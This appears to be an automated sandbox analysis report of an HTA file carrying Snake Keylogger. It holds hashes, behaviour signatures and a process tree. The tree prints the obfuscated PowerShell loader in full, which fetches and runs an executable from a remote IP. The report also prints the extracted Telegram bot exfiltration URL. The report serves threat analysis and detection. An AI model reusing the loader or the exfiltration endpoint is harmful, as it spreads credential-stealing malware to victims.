Analysis
-
max time kernel
148s -
max time network
157s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
16-10-2024 15:25
Static task
static1
Behavioral task
behavioral1
Sample
na.hta
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
na.hta
Resource
win10v2004-20241007-en
General
-
Target
na.hta
-
Size
129KB
-
MD5
03140c0995d8db21fe4fb2f030322615
-
SHA1
0199286b876a0d3e896b1830ff024555374e51f3
-
SHA256
95e002035116146de7fdf04b59845552552c7527b8bb3893abaf3a51d5061305
-
SHA512
9f2682368cd24bf210edf0ec6d286d016a89b5fba4649fdd76d18bdc7f1cbc4dfb079079d074756dbfcf6377c1e34d6b59664df6ca7a8e6770af2fce704e09f9
-
SSDEEP
96:Eam780jLy6w80jLyrdUwSdffYJMK0jLyqx0jLyt0Aj5OtG80jLy987T:Ea280f7w80fCUpdWMK0fd0fX5A80fGCT
Malware Config
Extracted
snakekeylogger
https://api.telegram.org/bot7913958792:AAFOhfKo5L7M50XG6odxxQQwJAeD3zGEuJU/sendMessage?chat_id=7004340450
Signatures
-
Snake Keylogger
Keylogger and Infostealer first seen in November 2020.
-
Snake Keylogger payload 1 IoCs
resource yara_rule behavioral2/memory/1780-91-0x0000000000400000-0x0000000000426000-memory.dmp family_snakekeylogger -
Blocklisted process makes network request 1 IoCs
flow pid Process 20 3160 PowERShELL.Exe -
Downloads MZ/PE file
-
Evasion via Device Credential Deployment 2 IoCs
pid Process 3160 PowERShELL.Exe 3084 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation mshta.exe -
Executes dropped EXE 1 IoCs
pid Process 1976 taskhostw.exe -
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key opened \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key opened \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 22 checkip.dyndns.org -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral2/files/0x000b000000023b86-75.dat autoit_exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 1976 set thread context of 1780 1976 taskhostw.exe 99 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 7 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PowERShELL.Exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskhostw.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegSvcs.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 3160 PowERShELL.Exe 3160 PowERShELL.Exe 3084 powershell.exe 3084 powershell.exe 1780 RegSvcs.exe 1780 RegSvcs.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 1976 taskhostw.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 3160 PowERShELL.Exe Token: SeDebugPrivilege 3084 powershell.exe Token: SeDebugPrivilege 1780 RegSvcs.exe -
Suspicious use of WriteProcessMemory 19 IoCs
description pid Process procid_target PID 3648 wrote to memory of 3160 3648 mshta.exe 85 PID 3648 wrote to memory of 3160 3648 mshta.exe 85 PID 3648 wrote to memory of 3160 3648 mshta.exe 85 PID 3160 wrote to memory of 3084 3160 PowERShELL.Exe 89 PID 3160 wrote to memory of 3084 3160 PowERShELL.Exe 89 PID 3160 wrote to memory of 3084 3160 PowERShELL.Exe 89 PID 3160 wrote to memory of 4724 3160 PowERShELL.Exe 94 PID 3160 wrote to memory of 4724 3160 PowERShELL.Exe 94 PID 3160 wrote to memory of 4724 3160 PowERShELL.Exe 94 PID 4724 wrote to memory of 1008 4724 csc.exe 95 PID 4724 wrote to memory of 1008 4724 csc.exe 95 PID 4724 wrote to memory of 1008 4724 csc.exe 95 PID 3160 wrote to memory of 1976 3160 PowERShELL.Exe 97 PID 3160 wrote to memory of 1976 3160 PowERShELL.Exe 97 PID 3160 wrote to memory of 1976 3160 PowERShELL.Exe 97 PID 1976 wrote to memory of 1780 1976 taskhostw.exe 99 PID 1976 wrote to memory of 1780 1976 taskhostw.exe 99 PID 1976 wrote to memory of 1780 1976 taskhostw.exe 99 PID 1976 wrote to memory of 1780 1976 taskhostw.exe 99 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\na.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3648 -
C:\Windows\SysWOW64\WInDoWspOwERsHell\v1.0\PowERShELL.Exe"C:\Windows\SYStEM32\WInDoWspOwERsHell\v1.0\PowERShELL.Exe" "POwersHelL -ex byPaSS -Nop -w 1 -c deViceCrEdeNtIAldepLoyMENt.exE ; Iex($(iEx('[sYStEM.TEXt.enCodInG]'+[cHaR]58+[chAr]0X3a+'UTf8.gETSTRInG([SYSTEm.COnVert]'+[ChaR]58+[ChAR]0X3A+'FroMbASE64strINg('+[ChAR]0X22+'JG44ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBZGQtVHlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJlckRFZklOSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT04uZGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1tVkYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrd1pEdUhyU0osc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB6cUxySWYsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWUN1bGdiLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmlmKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkp4dkVqQU9mV0RaIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVzcGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZ2V1USAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJG44OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuMjUvMjgwL3Rhc2tob3N0dy5leGUiLCIkRW52OkFQUERBVEFcdGFza2hvc3R3LmV4ZSIsMCwwKTtzVGFSdC1zTGVlUCgzKTtTVGFydCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVx0YXNraG9zdHcuZXhlIg=='+[chAR]0x22+'))')))"2⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3160 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex byPaSS -Nop -w 1 -c deViceCrEdeNtIAldepLoyMENt.exE3⤵
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3084
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\flqhybhm\flqhybhm.cmdline"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4724 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES95F6.tmp" "c:\Users\Admin\AppData\Local\Temp\flqhybhm\CSC2644BB8ACA2446C383F3CB19C7E85326.TMP"4⤵
- System Location Discovery: System Language Discovery
PID:1008
-
-
-
C:\Users\Admin\AppData\Roaming\taskhostw.exe"C:\Users\Admin\AppData\Roaming\taskhostw.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:1976 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Users\Admin\AppData\Roaming\taskhostw.exe"4⤵
- Accesses Microsoft Outlook profiles
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:1780
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD53d086a433708053f9bf9523e1d87a4e8
SHA1b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28
SHA2566f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69
SHA512931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd
-
Filesize
18KB
MD5a1b935891d86d884c382a9d2c15c9b79
SHA19445a427b32f6dde7b968a64d37de94852b52c2d
SHA256c855517c6f1c656b917b92423a6a265bb1df98ee2891aeca2fb865b58b542903
SHA512551ee38e593bea6f1f43ad7c6dcd3be03c15ae09b54f6bf5864cd6fd425d0d424df8414049d1d2d0edbc3c067831a2c3d2f874aeca4fb3a1817c09baf18674e8
-
Filesize
1KB
MD507ab074de673dae6e3eb33fed4ca6d7e
SHA11224f3bfc9ec4caa31cebf34adcedf9c5e45beff
SHA2564288fb27b03770ca11328e5b09089d5e87f7706d02ce16ef84c9054eedaa0351
SHA512270478dcdd57042236ebebecfa9b795831eefbf9eecc1794fe8bdae189266197cf84db6b341bfb48903b9fa06fcc88f10188d822588108a64f97e3c5b4fffdda
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
3KB
MD5f1dc8f285023922952b4ef2a20ad46be
SHA1a5227fa205a07892a165d572920a7a57606b8cc8
SHA256159158bdc7082af39c79b0f0272b3aac28d72b058ff10a2ed241a27e566f63b4
SHA5120a74ef5300f36e663770e10b1bdf56c26bc022fe13e851dd2ad6ac57d59ff344456cc7753cb7ddf9c6a946ded81eae60ed5338d0dd454a59eaf62c2bf2016569
-
Filesize
935KB
MD5daaa8ac3995fb610eda2e52a639d191f
SHA12a26a631b79878c461248d5c03a33fb312aedb05
SHA256e82aa9f8f95f53d306db35e28e6fdd4dd16eba7d7437971f929d3cf5470267b7
SHA512808c18d514439aead5759bd3d1bfbfb1b31cfb6c03a147db8525aa8f7dec30fb4b73a12b4e4310f97b9917f6513594d917184434f49ff9a5ee1870c46ae75157
-
Filesize
652B
MD5bd95e4fa8f0813df6ecc040641246c82
SHA1bf08ea07da4c47cda9e74577362835d79d37611a
SHA2567d90e92b9ee877a68eeb3a02872f40a96b750aaeafaae36df95d2b7d340f6eb9
SHA512cfa9a9623118f2dbb2c0ed5d7db74b89aca1e44ab3d2ada667266337ef1338429ff470c988d743fe22cfce0c9c46b19ad92566a4ad6041212b433a6690d7e875
-
Filesize
474B
MD50e03065f874d09489b23d564815660e8
SHA1005cc140f8d9ad68a7863aee4da445e466c98379
SHA2569600c5f95e6b296008011163196ad864c684b50e172ea35f0ca140ce577c75f1
SHA512a55b8c7d5656c0c854da908ecf6bcc64f9520b61ff21154aa548e01dbd69ffd762806c09b3ec331d94b23b6145b48e2e649ead07dab8d73a17bc2a6981800d10
-
Filesize
369B
MD5275b3f07f3e86fc97b49a6e9c281fe68
SHA19316f7aaec0cc4bd8aaf61334929100f9d57e404
SHA256dd30cfa979361f4164438810254d4bdc22161bfc296278a9ed493a5843c65777
SHA51239bb97b4843cb07d62d7975834ea1ce01f16ce7ba54e872da6cfb18b0b0bcbf4faf3c790846fe85d47a89bc9b536a00fa530b44c5582368fd9cc83e926168dff